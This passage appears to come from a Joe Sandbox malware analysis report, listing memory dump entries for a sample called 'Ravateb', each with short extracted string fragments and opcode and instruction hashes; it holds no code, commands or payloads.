          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$VUUU$gfff$KM_^
          • API String ID: 0-1712151901
          • Opcode ID: 4716125e4ddbef215dd6e32f7c196c8286de92493ef647ce7901a807b573b3b7
          • Instruction ID: c35582553e279f5190b191b702b72fe3909aa77c3ab407856397de90118c3da8
          • Opcode Fuzzy Hash: 4716125e4ddbef215dd6e32f7c196c8286de92493ef647ce7901a807b573b3b7
          • Instruction Fuzzy Hash: A813F571A0C95E8BEB5CDB6C985667477D2EB64B40F1482FED00EC32D6EE24AC41C762
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$VUUU$gfff
          • API String ID: 0-1065889911
          • Opcode ID: 6885a864d04620f8488a028798d1124c610e87587f539b13d22a0d0af3edc505
          • Instruction ID: e1a552b25c1357c5c2227a099f56591ad63b8b5c10ed486072d3548fc272c700
          • Opcode Fuzzy Hash: 6885a864d04620f8488a028798d1124c610e87587f539b13d22a0d0af3edc505
          • Instruction Fuzzy Hash: 6672C271A1891E8FEB5CDB2C9856A7477D2EB68740F5482FED00EC3296EE34AC41C752
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: J?=$J?=$J?=$J?=$J?=$KM_^
          • API String ID: 0-690282634
          • Opcode ID: ada2e542992c45dc2ff005522639834e79b0d0532e6a7bc82c06a56bcd7a94de
          • Instruction ID: e26a779581832e7897abcec5f8e99b21f87fdc7cc924cd880c816528c6a93714
          • Opcode Fuzzy Hash: ada2e542992c45dc2ff005522639834e79b0d0532e6a7bc82c06a56bcd7a94de
          • Instruction Fuzzy Hash: E6122471A0C95E4BEB5CDB6898567747BD2EB64740F5482FED04AC32D3ED28AC42C362
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 0$gfff
          • API String ID: 0-4230242222
          • Opcode ID: 5d48c9e12c7cebcbdc7b3717f65207d5eb9c4d627d1f6c0c07a9935f55bdbc80
          • Instruction ID: 6ed204b843d16ae7f6c3093d466b9226e8cbebb1101d180e0531d7449b887aac
          • Opcode Fuzzy Hash: 5d48c9e12c7cebcbdc7b3717f65207d5eb9c4d627d1f6c0c07a9935f55bdbc80
          • Instruction Fuzzy Hash: 57424631A1C56E0FE75C9668A8062B53BD1EF85754F1482BAD04EC32DBFD28B816C3B1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: &M_I
          • API String ID: 0-4001139138
          • Opcode ID: c2cea4d2909c16b7e53076156a102bd7a12a6e1a00c0bfeeef34aa019debe8e4
          • Instruction ID: ffe458d91d564e086bbe1d54432022f9839f5d6ebd071ad1be0dd7ad8790452c
          • Opcode Fuzzy Hash: c2cea4d2909c16b7e53076156a102bd7a12a6e1a00c0bfeeef34aa019debe8e4
          • Instruction Fuzzy Hash: 70022B22E0DA9E4BE719976CA8161B97F91EF4236470443FBD0C9C7097FC14A94AC3B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: gfff
          • API String ID: 0-1553575800
          • Opcode ID: 614069d45d293a5d4b9a4d4c21773d65f880a8edc5980cff2b0dae25d736d6bb
          • Instruction ID: 584bce2579004d3ca389bde7c80c98b3109b163fb19428b9c7a57938715aa76b
          • Opcode Fuzzy Hash: 614069d45d293a5d4b9a4d4c21773d65f880a8edc5980cff2b0dae25d736d6bb
          • Instruction Fuzzy Hash: 34B14021F1C82E0BE75C926C58023B876C2EF84755F54C2B9D40EC72DBFD28B95682B1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: gfff
          • API String ID: 0-1553575800
          • Opcode ID: d4a0dc2a1d65338dff5d55e8ffdb5120ce2b5139d20380ac1c928e1e0f7d3c7b
          • Instruction ID: e46c00e4db75bcd96e556e2636397a9296a67f9b3b4e1117e9f21c6630b93200
          • Opcode Fuzzy Hash: d4a0dc2a1d65338dff5d55e8ffdb5120ce2b5139d20380ac1c928e1e0f7d3c7b
          • Instruction Fuzzy Hash: ECB13E21F1C82E0BEB5C926C68023B876C2EF84755F5482BDD40EC71DBFD28B95692B1
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7471f50b5713b4a217f2be752e991649f4a6ce28dc52e70b1219f1ef3d3ecd56
          • Instruction ID: df85a1be44c2f7640e33b0798a86f0c65337b30b2924aad108d69026b4bb6dd5
          • Opcode Fuzzy Hash: 7471f50b5713b4a217f2be752e991649f4a6ce28dc52e70b1219f1ef3d3ecd56
          • Instruction Fuzzy Hash: F4F1A330918A4E8FEBA8DF28C8557E937E1FF54350F04826AE84DC7295DB38A945CB91
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e54f166ec809e9323c8bb7c3ac2a7644b0d6acf67b37fa40c88f4c08c8e7cbb4
          • Instruction ID: 2d3e2daabf91e47fe1525cdb3c8b74d38e6115f5420627610b9edfeeb905a6c0
          • Opcode Fuzzy Hash: e54f166ec809e9323c8bb7c3ac2a7644b0d6acf67b37fa40c88f4c08c8e7cbb4
          • Instruction Fuzzy Hash: 26E1D430908A8E8FEBA8DF68C8557E977E1FB54310F14826ED84DC3291EF78A941C791
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: V=$(V=$0V=$8V=$@Y=$HW=
          • API String ID: 0-1222742678
          • Opcode ID: de6432054c53a1e71847c730d25463096e82d7e74e3c2c3f10636b6e003144bf
          • Instruction ID: 6b63eabeb3bf5d83aa1d74d960ae3d673cb7c92d7be831350df6d7b926acc77f
          • Opcode Fuzzy Hash: de6432054c53a1e71847c730d25463096e82d7e74e3c2c3f10636b6e003144bf
          • Instruction Fuzzy Hash: F7A10561F1CD9E4BEB68D6A884555B57BD1EFA0350B1882FBC04AC31D7FD28A846C361
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: @Z=$Bu=$`n=$tM_L$wM_H
          • API String ID: 0-911148872
          • Opcode ID: 1c0cae5544c5a97add7c34ddd5efd789cc9f9db3ab093bc62cefe6216bf29d4c
          • Instruction ID: 3ad8296e500a2d88980ae86914da132326f2462413b3add15225acfaa4550421
          • Opcode Fuzzy Hash: 1c0cae5544c5a97add7c34ddd5efd789cc9f9db3ab093bc62cefe6216bf29d4c
          • Instruction Fuzzy Hash: 2CF1D271A1CE5E8FDB98EB58D4419B577E1FFA8300B1442EAD04AC3296EE24FC46C791
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: T=$8p=$i=
          • API String ID: 0-3631545301
          • Opcode ID: 88621f26c1c016f4aa15a4dbe7a97f5351500e8e08617526e82807c9010fdb99
          • Instruction ID: d72425c8f8223fea087f5242cb288b0f4f6d2b4106afe3f37d5c23e5c14df64f
          • Opcode Fuzzy Hash: 88621f26c1c016f4aa15a4dbe7a97f5351500e8e08617526e82807c9010fdb99
          • Instruction Fuzzy Hash: FF313961A1DE5E0FD369A6AC98410B57BE0EF6422070482FFD08EC31D7FC186C4AC3A1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: @`=$pc=
          • API String ID: 0-1361523942
          • Opcode ID: a77607b51693e380afd0b42677665f5b51885b710599f81d807a9ae172bd4d58
          • Instruction ID: cebe27fcf6d45c099dc3aa7ad170cc307a41d0fa04c3d828b6bfd1a8f90c10de
          • Opcode Fuzzy Hash: a77607b51693e380afd0b42677665f5b51885b710599f81d807a9ae172bd4d58
          • Instruction Fuzzy Hash: 9C911762A1CD9E8BEB58E77C84551B577E1EF94740B1486FBD04AC7187FD28A842C360
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: N_^$N_^
          • API String ID: 0-386383641
          • Opcode ID: 32bc7e4bfac4117c15f63abad089da0279aad42fbff699ad398952785e2563d9
          • Instruction ID: 77ce00cbf313b19faeeee78c56ac92b26b395d2b12fc882a11e2485178edf3f9
          • Opcode Fuzzy Hash: 32bc7e4bfac4117c15f63abad089da0279aad42fbff699ad398952785e2563d9
          • Instruction Fuzzy Hash: C451A34290EAEE0EF656A3B828610E83F919F4229870945FBC0D9CF0D7FC1C5996D276
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 8=
          • API String ID: 0-2352240893
          • Opcode ID: 2e7207eb0ce09b58404fdaa369599983f27705921e356363e95782912686bd0f
          • Instruction ID: 62e832684f7774fecb267a06d79f06a92ed3a52f3c16b0b2d7a8b6219f8bbe4a
          • Opcode Fuzzy Hash: 2e7207eb0ce09b58404fdaa369599983f27705921e356363e95782912686bd0f
          • Instruction Fuzzy Hash: 8B42033190CB9D4FEBAA9B5888512B87FE1FF55750F0400FED449C7192EE25AC86C7A2
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: qM_H
          • API String ID: 0-3483471439
          • Opcode ID: bafbef9ed24ad70b67d9941d76cf0b550c2468d31cf60c81157713ff7942f273
          • Instruction ID: a36a3c69be03b303b2c8bc0ff549bcb2e60e468354ce95ad2ae193ab264fa8fa
          • Opcode Fuzzy Hash: bafbef9ed24ad70b67d9941d76cf0b550c2468d31cf60c81157713ff7942f273
          • Instruction Fuzzy Hash: 83128174A1896E8FEB99E79CD8857B977E1FF58700F5042B5D00DD3286EE386842C721
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 8=
          • API String ID: 0-2352240893
          • Opcode ID: f232cebdbb60ed56adad7c688d59167b0d799f4c9c8d8b081a30d4621acab853
          • Instruction ID: eecdfdbabbcc5871bd1c828410ce94cc282563e4bd491ce87868ef5fd81236bf
          • Opcode Fuzzy Hash: f232cebdbb60ed56adad7c688d59167b0d799f4c9c8d8b081a30d4621acab853
          • Instruction Fuzzy Hash: 6B02F131A0DBAD4FEBAA975848512B87FE1EF55651F0801FBC04DC7193EE296C85C3A2
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 8=
          • API String ID: 0-2352240893
          • Opcode ID: c18ee61f93a7219d728ec457e9b79d0b1fe84ebbbdbb1f2a3c6d37a059b9352f
          • Instruction ID: 4478273014f33846659821ffc0c209c20b15640efa395eca12f4352e67a1c8ba
          • Opcode Fuzzy Hash: c18ee61f93a7219d728ec457e9b79d0b1fe84ebbbdbb1f2a3c6d37a059b9352f
          • Instruction Fuzzy Hash: DDE1D42190DBAE4FEBA6976848616747FE1EF56751B1900FBC04CCB1D3EE18AC85C362
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 8=
          • API String ID: 0-2352240893
          • Opcode ID: 6b70493a5a5487a1600acca1b6d67d2814dc79eaf26e53965cc5f166cccc9024
          • Instruction ID: 56802dab3d2e9c1cc76d3173cf3fd6ce581795d9dc577b3f7ddc916713ed8fc9
          • Opcode Fuzzy Hash: 6b70493a5a5487a1600acca1b6d67d2814dc79eaf26e53965cc5f166cccc9024
          • Instruction Fuzzy Hash: F9911431E0DB6E4FEBA9DB5888512787BE2EF95751F1400BAC04DD7183EE25AC85C362
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: `W=
          • API String ID: 0-2048444805
          • Opcode ID: ce8de83f29573d1061c65c422cd7e39ab293bcf3e2f586b23f02a8c41cbaf76d
          • Instruction ID: acd970df326926555069ce7d9dfd74bdba8244679761f56644b25a3e6f8eea07
          • Opcode Fuzzy Hash: ce8de83f29573d1061c65c422cd7e39ab293bcf3e2f586b23f02a8c41cbaf76d
          • Instruction Fuzzy Hash: 8E51CF6190D7D95FD75B877848AA1A13FF1DF6725070E41EBD089CB1A3E8185C0AC372
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: P9=
          • API String ID: 0-1482688260
          • Opcode ID: bc975a6bf0b215069bae3d0b83038ff8939d112a27d4c94f8f0eac704c2092aa
          • Instruction ID: b3d84e2eba0d00e7a148c9d8f333c99b3b01b3c68279a2a2a21506e02f4975f5
          • Opcode Fuzzy Hash: bc975a6bf0b215069bae3d0b83038ff8939d112a27d4c94f8f0eac704c2092aa
          • Instruction Fuzzy Hash: 27414B2291DDAE4FE76DA29858411B53BD1EFA5750B1541BBC48EC31C3FD186C42C3B1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: J?=
          • API String ID: 0-1970131801
          • Opcode ID: a613f4c64f7d55c74b030ac7ab0cf304d51fc315bdd720e9b1cbab6b3f57f098
          • Instruction ID: ffa3747066dd6c85f97e917a03c9e54eda6fe72f9bd127c14c0ff976d8b994cc
          • Opcode Fuzzy Hash: a613f4c64f7d55c74b030ac7ab0cf304d51fc315bdd720e9b1cbab6b3f57f098
          • Instruction Fuzzy Hash: FB41D371B0891E9BEE4C9B2C9855A7073D1EB74740B5181FDD00EC3296EE74EC85C691
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: `W=
          • API String ID: 0-2048444805
          • Opcode ID: de51c96a1c1a6499fac5ff36e01834ae5819ff7b07581f954d3cd69ee67be280
          • Instruction ID: 13146b23d62b25ec0ec5be720b16533b8068b0ae46081be1c3d52db4bea8bd6f
          • Opcode Fuzzy Hash: de51c96a1c1a6499fac5ff36e01834ae5819ff7b07581f954d3cd69ee67be280
          • Instruction Fuzzy Hash: D0315EA190E7CA5FD75B87B848A61A03FF1DF6725470A40EBC089CB1A3E8185C5AD772
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: J?=
          • API String ID: 0-1970131801
          • Opcode ID: 0daf936709b1203e3e3e0aaaf20bf0d559526796975d7f730cc1b156eb9ed0b7
          • Instruction ID: 03b07049015b80bc327177a2460fa8a36b7ac0aadcc35fe35d49918f09771fa0
          • Opcode Fuzzy Hash: 0daf936709b1203e3e3e0aaaf20bf0d559526796975d7f730cc1b156eb9ed0b7
          • Instruction Fuzzy Hash: D201D671A08C1D9FDF68EB2C9459E7137D1EB74740B5582A9C00EC3196EE34EC41CB91
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: gM_^
          • API String ID: 0-1309094749
          • Opcode ID: a9e2c27ce44e3f617289fca8492b187cb0808f31fc612bbf01e910ec034c0f37
          • Instruction ID: e4dd0f29b157c37acfc20bba7fcc3db8a928c3c83e8a290dcd006f85b81eec5c
          • Opcode Fuzzy Hash: a9e2c27ce44e3f617289fca8492b187cb0808f31fc612bbf01e910ec034c0f37
          • Instruction Fuzzy Hash: 4E01621291CE7E47E37576B830151E46B919F09324F0846B6E0CD96483FD6869C6C2B5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1de70c790b085a922c0eb27dbda07ad4a73ca7b87d20b60b969a8d99a9110ca8
          • Instruction ID: 809dd33d1bd5ff7f0485457412b0413edd7b62b411b230e0e6789db34f7dd041
          • Opcode Fuzzy Hash: 1de70c790b085a922c0eb27dbda07ad4a73ca7b87d20b60b969a8d99a9110ca8
          • Instruction Fuzzy Hash: 8FC180B1918B5D8FEBA4DF58C8857A9BBE1FB88358F1001A9D14DD3281EF346981CB25
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f58a8cb205ead27c8ea25a3a03035fb69d31533923133931b1f951393bac00e1
          • Instruction ID: 57491e65b226f2465961fee61c3794be5712eba0a404062a8a6222858b1c80f0
          • Opcode Fuzzy Hash: f58a8cb205ead27c8ea25a3a03035fb69d31533923133931b1f951393bac00e1
          • Instruction Fuzzy Hash: 12B1A430B1892E8FEB98EB68C45567977E1FF89B44F1045B9D10EC3295EE29B805C760
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a5b788711c3afe890a18d0268c481e961285c00a3036f30d6271c9d869a5cb8e
          • Instruction ID: c50c718168c6d765df78729640e7eb426e3f59d92a9f390a5435bb968a07e8ab
          • Opcode Fuzzy Hash: a5b788711c3afe890a18d0268c481e961285c00a3036f30d6271c9d869a5cb8e
          • Instruction Fuzzy Hash: 15518031918A1C8FDB68DF58D845BE9BBF1FB59310F1082AAD04DE3252DE34A985CF91
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c19d55c0359d17e620770bf29f3da41b0c324773d76eb6d20a34977aa6034858
          • Instruction ID: 5b39c7181ecf3950ef2184b12e9c406d3285e2e86baa8aa9da9192a936ab0e6c
          • Opcode Fuzzy Hash: c19d55c0359d17e620770bf29f3da41b0c324773d76eb6d20a34977aa6034858
          • Instruction Fuzzy Hash: 2E51167180D7C88FD7568B2898116A47FF0FF97321F0542EFE089C7193D6689856CBA2
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8a4efa7c1b1514c20160013f8e43548c9f70d4ded2c4c12a6f43476f1d28ef05
          • Instruction ID: 99a89e0f12a95069e7762699776479a19ecfe8699de1ac4853fbf56f64707c3f
          • Opcode Fuzzy Hash: 8a4efa7c1b1514c20160013f8e43548c9f70d4ded2c4c12a6f43476f1d28ef05
          • Instruction Fuzzy Hash: 80411822A09D2E0BE6A5E75CA4953F977D1EF543A4B0802B7D44DC7197FD289C82C3A0
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b7d4c645bb7dc1f6b25c773001f8b2a9b15382a1ca505532173be77ef8024665
          • Instruction ID: 6d9b1f0ab47439fb5a804cc43b27077211433dc609b2aa23bcdd6bf973eeddbe
          • Opcode Fuzzy Hash: b7d4c645bb7dc1f6b25c773001f8b2a9b15382a1ca505532173be77ef8024665
          • Instruction Fuzzy Hash: 9E41243190C96E4BEF58EBAC98115E97BA2EF58750B0441BAE48CE3193EE246C45C3B5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: fcb193aed4642e94f3ecb1a296dd2b00d2d5a14b891c28d1a78aa73a5f468753
          • Instruction ID: c8a0174b08d7a647e48154a262466974cc0c51af59f0f3495115673877ad5df7
          • Opcode Fuzzy Hash: fcb193aed4642e94f3ecb1a296dd2b00d2d5a14b891c28d1a78aa73a5f468753
          • Instruction Fuzzy Hash: E741644290DAFE0EE656A3BC28611F83F919F4269470945F7C089CB0D7FC1C5996D3B6
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 84625bfaf24b52900c207893bc897a57654f30de509172f4745a0af910ce893d
          • Instruction ID: 1dc6f7820306515f407ca4048ec96647bdb11297ef17f0e043e974e61f2f0281
          • Opcode Fuzzy Hash: 84625bfaf24b52900c207893bc897a57654f30de509172f4745a0af910ce893d
          • Instruction Fuzzy Hash: 0A41377190DA9E8FEF99CB6C88116E97BE2EF59340B0841EBD44CD3292DE245C05C3B6
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 78ac7a40f6da00a1510faad15ee7fe5de8ecc77746357f5bdc310ea74893a56e
          • Instruction ID: 180db0ba3e84cdeb996e2338552c7fb6a47f4b31e424fbd30f6a046b77258e75
          • Opcode Fuzzy Hash: 78ac7a40f6da00a1510faad15ee7fe5de8ecc77746357f5bdc310ea74893a56e
          • Instruction Fuzzy Hash: AD412B72D0CA6D8BFB54EB6898552F87BE1EF54318F0001BAC08CD7182FE346A81CB65
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1ace21b269aaf9e9fe5891e16ea983fbed3bb62c8c856fea00f0049af34f2104
          • Instruction ID: 1b9a670ceaff35d69b054a04476669b1ca3a2fed4f585f802145a4ed6c80b9df
          • Opcode Fuzzy Hash: 1ace21b269aaf9e9fe5891e16ea983fbed3bb62c8c856fea00f0049af34f2104
          • Instruction Fuzzy Hash: 7B412331A0C91E8FEF9CDB588855AB97BE2EF98740F0441BAD40CE3295DE396C05C7A5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7261ed5da4bdec1ee5c9dc7063c876a49f902e953daa97ef141c7f4baa99616f
          • Instruction ID: b97074e20765ca4aeae4fdc768ca9fa23f22b3d300aa171e9cdea936c94c4aa3
          • Opcode Fuzzy Hash: 7261ed5da4bdec1ee5c9dc7063c876a49f902e953daa97ef141c7f4baa99616f
